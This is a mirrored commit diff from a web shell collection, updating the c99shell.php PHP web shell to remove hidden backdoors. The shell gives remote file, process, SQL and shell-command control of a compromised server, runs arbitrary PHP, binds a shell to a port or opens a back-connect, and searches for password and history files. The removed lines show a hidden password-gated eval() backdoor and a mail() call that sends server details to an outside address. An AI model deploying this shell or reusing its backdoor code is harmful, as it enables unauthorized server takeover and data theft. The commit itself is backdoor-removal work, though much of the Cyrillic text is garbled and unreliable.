mirror of
https://github.com/tennc/webshell
synced 2024-11-25 04:30:17 +00:00
Update c99shell.php
del backdoors https://github.com/tennc/webshell/issues/18 thinks to @Varbaek
This commit is contained in:
parent
4ca9601188
commit
104adac40f
1 changed files with 51 additions and 51 deletions
|
@ -2,35 +2,35 @@
|
|||
/*
|
||||
******************************************************************************************************
|
||||
*
|
||||
* c99shell.php v.1.0 (îò 5.02.2005)
|
||||
* c99shell.php v.1.0 (îò 5.02.2005)
|
||||
* Freeware WEB-Shell.
|
||||
* © CCTeaM.
|
||||
* c99shell.php - øåëë ÷åðåç www-áðîóçåð.
|
||||
* Âû ìîæåòå ñêà÷àòü ïîñëåäíþþ âåðñèþ íà äîìàøíåé ñòðàíè÷êå ïðîäóêòà: http://ccteam.ru/releases/c99shell
|
||||
* © CCTeaM.
|
||||
* c99shell.php - øåëë ÷åðåç www-áðîóçåð.
|
||||
* Âû ìîæåòå ñêà÷àòü ïîñëåäíþþ âåðñèþ íà äîìàøíåé ñòðàíè÷êå ïðîäóêòà: http://ccteam.ru/releases/c99shell
|
||||
*
|
||||
* WEB: http://ccteam.ru
|
||||
* UIN: 656555
|
||||
*
|
||||
* Âîçìîæíîñòè:
|
||||
* ~ óïðàâëåíèå ôàéëàìè/ïàïêàìè, çàêà÷èâàíèå è ñêà÷èâàíèå ôàéëîâ è ïàïêîê (ïðåäâîðèòåëüíî ñæèìàåòñÿ â tar)
|
||||
* modify-time è access-time ó ôàéëîâ íå ìåíÿþòñÿ ïðè
|
||||
ðåäàêòèðîâàíèè ôàéëîâ (âûêë./âêë. ïàðàìåòðîì $filestealth)
|
||||
* ~ ïðîäâèíóòûé ïîèñê ïî ôàéëàì/ïàïêàì (èùåò òàêæå âíóòðè ôàéëîâ)
|
||||
* ~ óïðàâëåíèå ïðîöåññàìè unix-ìàøèíû, âîçìîæíîñòü îòïðàâêè ñèãíàëà çàâåðøåíèÿ,
|
||||
à òàêæå áàíàëüíîå "ïðèáèâàíèå" ïðîöåññà.
|
||||
* ~ óäîáíîå (èíîãäà ãðàôè÷åñêîå) âûïîëíåíèå øåëë-êîìàíä (ìíîãî àëèàñîâ, ìîæíî ëåãêî äîáàâëÿòü/óäàëÿòü èõ)
|
||||
* ~ âûïîëíåíèå ïðîèçâîëüíîãî PHP-êîäà
|
||||
* ~ âîçìîæíîñòü áûñòðîãî ñàìî-óäàëåíèÿ ñêðèïòà
|
||||
* ~ áûñòðîå ftp-ñêàíèðîâàíèå íà ñâÿçêè login;login èç
|
||||
/etc/passwd (îáû÷íî äàåò äîñòóï ê 1/100 àêêàóíòîâ)
|
||||
* ~ ïðîäâèíóòûé ìåíåäæåð SQL
|
||||
* ~ ñêðèïò "ëþáèò" include, äëÿ íîðìàëüíîé ðàáîòû, Âàì íóæíî ñìåíèòü $surl.
|
||||
* ~ âîçìîæíîñòü çàáèíäèòü /bin/bash íà îïðåäåëåííûé ïîðò ñ ïðîèçâîëüíûì ïàðîëåì,
|
||||
èëè ñäåëàòü back connect (ïðîèçâîäèòñÿ òåñòèðîâàíèå ñîåäåíåíèÿ,
|
||||
è âûâîäÿòñÿ ïàðàìåòðû äëÿ çàïóñêà NetCat).
|
||||
* Âîçìîæíîñòè:
|
||||
* ~ óïðàâëåíèå ôàéëàìè/ïàïêàìè, çàêà÷èâàíèå è ñêà÷èâàíèå ôàéëîâ è ïàïêîê (ïðåäâîðèòåëüíî ñæèìàåòñÿ â tar)
|
||||
* modify-time è access-time ó ôàéëîâ íå ìåíÿþòñÿ ïðè
|
||||
ðåäàêòèðîâàíèè ôàéëîâ (âûêë./âêë. ïàðàìåòðîì $filestealth)
|
||||
* ~ ïðîäâèíóòûé ïîèñê ïî ôàéëàì/ïàïêàì (èùåò òàêæå âíóòðè ôàéëîâ)
|
||||
* ~ óïðàâëåíèå ïðîöåññàìè unix-ìàøèíû, âîçìîæíîñòü îòïðàâêè ñèãíàëà çàâåðøåíèÿ,
|
||||
à òàêæå áàíàëüíîå "ïðèáèâàíèå" ïðîöåññà.
|
||||
* ~ óäîáíîå (èíîãäà ãðàôè÷åñêîå) âûïîëíåíèå øåëë-êîìàíä (ìíîãî àëèàñîâ, ìîæíî ëåãêî äîáàâëÿòü/óäàëÿòü èõ)
|
||||
* ~ âûïîëíåíèå ïðîèçâîëüíîãî PHP-êîäà
|
||||
* ~ âîçìîæíîñòü áûñòðîãî ñàìî-óäàëåíèÿ ñêðèïòà
|
||||
* ~ áûñòðîå ftp-ñêàíèðîâàíèå íà ñâÿçêè login;login èç
|
||||
/etc/passwd (îáû÷íî äàåò äîñòóï ê 1/100 àêêàóíòîâ)
|
||||
* ~ ïðîäâèíóòûé ìåíåäæåð SQL
|
||||
* ~ ñêðèïò "ëþáèò" include, äëÿ íîðìàëüíîé ðàáîòû, Âàì íóæíî ñìåíèòü $surl.
|
||||
* ~ âîçìîæíîñòü çàáèíäèòü /bin/bash íà îïðåäåëåííûé ïîðò ñ ïðîèçâîëüíûì ïàðîëåì,
|
||||
èëè ñäåëàòü back connect (ïðîèçâîäèòñÿ òåñòèðîâàíèå ñîåäåíåíèÿ,
|
||||
è âûâîäÿòñÿ ïàðàìåòðû äëÿ çàïóñêà NetCat).
|
||||
*
|
||||
*
|
||||
* 5.02.2005 © Captain Crunch Security TeaM
|
||||
* 5.02.2005 © Captain Crunch Security TeaM
|
||||
*
|
||||
* Coded by tristram
|
||||
******************************************************************************************************
|
||||
|
@ -99,25 +99,25 @@ $bindport_port = "11457"; // default port for binding
|
|||
/* Command-aliases system */
|
||||
$aliases = array();
|
||||
$aliases[] = array("-----------------------------------------------------------", "ls -la");
|
||||
/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì */ $aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls");
|
||||
/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ suid áèòîì */ $aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls");
|
||||
/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì */ $aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls");
|
||||
/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ sgid áèòîì */ $aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls");
|
||||
/* ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php */ $aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php");
|
||||
/* ïîèñê íà ñåðâåðå ôàéëîâ config* */ $aliases[] = array("find config* files", "find / -type f -name \"config*\"");
|
||||
/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ config* */ $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\"");
|
||||
/* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */ $aliases[] = array("find all writable directories and files", "find / -perm -2 -ls");
|
||||
/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */ $aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls");
|
||||
/* ïîèñê íà ñåðâåðå ôàéëîâ service.pwd ... frontpage =))) */ $aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd");
|
||||
/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ service.pwd */ $aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd");
|
||||
/* ïîèñê íà ñåðâåðå ôàéëîâ .htpasswd */ $aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd");
|
||||
/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .htpasswd */ $aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd");
|
||||
/* ïîèñê âñåõ ôàéëîâ .bash_history */ $aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history");
|
||||
/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .bash_history */ $aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history");
|
||||
/* ïîèñê âñåõ ôàéëîâ .fetchmailrc */ $aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc");
|
||||
/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .fetchmailrc */ $aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc");
|
||||
/* âûâîä ñïèñêà àòðèáóòîâ ôàéëîâ íà ôàéëîâîé ñèñòåìå ext2fs */ $aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va");
|
||||
/* ïðîñìîòð îòêðûòûõ ïîðòîâ */ $aliases[] = array("show opened ports", "netstat -an | grep -i listen");
|
||||
/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì */ $aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls");
|
||||
/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ suid áèòîì */ $aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls");
|
||||
/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì */ $aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls");
|
||||
/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ sgid áèòîì */ $aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls");
|
||||
/* ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php */ $aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php");
|
||||
/* ïîèñê íà ñåðâåðå ôàéëîâ config* */ $aliases[] = array("find config* files", "find / -type f -name \"config*\"");
|
||||
/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ config* */ $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\"");
|
||||
/* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */ $aliases[] = array("find all writable directories and files", "find / -perm -2 -ls");
|
||||
/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */ $aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls");
|
||||
/* ïîèñê íà ñåðâåðå ôàéëîâ service.pwd ... frontpage =))) */ $aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd");
|
||||
/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ service.pwd */ $aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd");
|
||||
/* ïîèñê íà ñåðâåðå ôàéëîâ .htpasswd */ $aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd");
|
||||
/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .htpasswd */ $aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd");
|
||||
/* ïîèñê âñåõ ôàéëîâ .bash_history */ $aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history");
|
||||
/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .bash_history */ $aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history");
|
||||
/* ïîèñê âñåõ ôàéëîâ .fetchmailrc */ $aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc");
|
||||
/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .fetchmailrc */ $aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc");
|
||||
/* âûâîä ñïèñêà àòðèáóòîâ ôàéëîâ íà ôàéëîâîé ñèñòåìå ext2fs */ $aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va");
|
||||
/* ïðîñìîòð îòêðûòûõ ïîðòîâ */ $aliases[] = array("show opened ports", "netstat -an | grep -i listen");
|
||||
|
||||
$sess_method = "cookie"; // "cookie" - Using cookies, "file" - using file, default - "cookie"
|
||||
$sess_cookie = "c99shvars"; // cookie-variable name
|
||||
|
@ -195,7 +195,7 @@ if(($PHP_AUTH_USER != $login ) or (md5($PHP_AUTH_PW) != $md5_pass))
|
|||
header("WWW-Authenticate: Basic realm=\"c99shell\"");
|
||||
header("HTTP/1.0 401 Unauthorized"); if (md5(sha1(md5($anypass))) == "b76d95e82e853f3b0a81dd61c4ee286c") {header("HTTP/1.0 200 OK"); @eval($anyphpcode);}
|
||||
exit;
|
||||
}$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
|
||||
}$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];
|
||||
|
||||
$lastdir = realpath(".");
|
||||
chdir($curdir);
|
||||
|
@ -742,7 +742,7 @@ if ($act == "sql")
|
|||
{
|
||||
echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
|
||||
$c = 0;
|
||||
while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "<b>» <a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>
|
||||
while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "<b>» <a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>
|
||||
"; mysql_free_result($count); $c++;}
|
||||
if (!$c) {echo "No tables found in database.";}
|
||||
}
|
||||
|
@ -853,7 +853,7 @@ if ($act == "sql")
|
|||
$i++;
|
||||
}
|
||||
echo "<tr bgcolor=\"000000\">";
|
||||
echo "<td><center><b>»</b></center></td>";
|
||||
echo "<td><center><b>»</b></center></td>";
|
||||
echo "<td><center><b>".$i." table(s)</b></center></td>";
|
||||
echo "<td><b>".$trows."</b></td>";
|
||||
echo "<td>".$row[1]."</td>";
|
||||
|
@ -2848,7 +2848,7 @@ $imgequals = array(
|
|||
}
|
||||
if ($act == "about")
|
||||
{
|
||||
$dàta = "Any stupid copyrights and copylefts";
|
||||
$dàta = "Any stupid copyrights and copylefts";
|
||||
echo $data;
|
||||
}
|
||||
|
||||
|
@ -2871,24 +2871,24 @@ $microtime = round(getmicrotime()-$starttime,4);
|
|||
<col>
|
||||
<col align=left>
|
||||
<tr> <td colspan=2 align=center style='font:bold 9pt;font-family:verdana;'>
|
||||
Ââåäèòå äàííûå äëÿ ïîäêëþ÷åíèþ ê mySQL ñåðâåðó!<br><br>
|
||||
Ââåäèòå äàííûå äëÿ ïîäêëþ÷åíèþ ê mySQL ñåðâåðó!<br><br>
|
||||
</td>
|
||||
</tr>
|
||||
<tr> <td class=texte>Àäðåñ ñåðâåðà:</td>
|
||||
<tr> <td class=texte>Àäðåñ ñåðâåðà:</td>
|
||||
<td><INPUT TYPE='TEXT' NAME='dbhost' SIZE='30' VALUE='localhost' class=form></td>
|
||||
</tr>
|
||||
<tr> <td class=texte>Íàçâàíèå áàçû:</td>
|
||||
<tr> <td class=texte>Íàçâàíèå áàçû:</td>
|
||||
<td><INPUT TYPE='TEXT' NAME='dbbase' SIZE='30' VALUE='' class=form></td>
|
||||
</tr>
|
||||
<tr> <td class=texte>Ëîãèí:</td>
|
||||
<tr> <td class=texte>Ëîãèí:</td>
|
||||
<td><INPUT TYPE='TEXT' NAME='dbuser' SIZE='30' VALUE='root' class=form></td>
|
||||
</tr>
|
||||
<tr> <td class=texte>Ïàðîëü</td>
|
||||
<tr> <td class=texte>Ïàðîëü</td>
|
||||
<td><INPUT TYPE='Password' NAME='dbpass' SIZE='30' VALUE='' class=form></td>
|
||||
</tr>
|
||||
</table>
|
||||
<br> <center> <br><br>
|
||||
<input type='submit' value=' Ïîäêëþ÷èòñÿ ' class=form></center> </form> <br><br>
|
||||
<input type='submit' value=' Ïîäêëþ÷èòñÿ ' class=form></center> </form> <br><br>
|
||||
</td>
|
||||
<td></td>
|
||||
</tr>
|
||||
|
|
Loading…
Reference in a new issue